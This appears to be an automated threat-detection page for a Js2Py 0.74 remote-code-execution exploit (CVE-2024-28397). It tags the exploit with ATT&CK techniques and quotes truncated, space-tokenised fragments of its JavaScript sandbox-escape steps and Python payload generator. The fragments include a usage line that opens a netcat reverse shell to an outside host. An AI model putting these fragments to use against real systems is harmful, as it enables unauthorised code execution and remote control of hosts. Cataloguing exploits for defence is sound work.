[webapps] Js2Py 0.74 - RCE
ATT&CK techniques detected
T1059.006 Python
61%
"/ / 1. obtain a pyobjectwrapper via object. getownpropertynames ( { } ) / / on python 3, this returns a wrapped dict _ keys object, exposing python internals. var leaked _ wrapper = object. getownpropertynames ( { } ) ; / / 2. access the python ' object ' class via _ _ class _ _.…"
T1059.007 JavaScript
50%
"[ webapps ] js2py 0. 74 - rce js2py 0. 74 - rce exploit title : js2py 0. 74 - rce date : 2026 - 02 - 03 exploit author : ali sunbul ( xeloxa ) < alisunbul @ proton. me > author page : https : / / github. com / xeloxa vendor homepage : https : / / github. com / piotrdabkowski / js…"
T1059.006 Python
42%
"during exploit execution : " + e ; } output " " " return payload. replace ( " command _ placeholder ", safe _ command ) def main ( ) - > none : parser = argparse. argumentparser ( description = " payload generator for cve - 2024 - 28397 ( js2py sandbox escape ) ", formatter _ cla…"
T1059.007 JavaScript
37%
"execute arbitrary commands on the host. this script acts as a payload generator. you must inject the generated output into the vulnerable input field of the target application. usage : python3 exploit. py - c " id " > payload. js python3 exploit. py - c " nc - e / bin / bash 10. …"
Summary
Js2Py 0.74 - RCE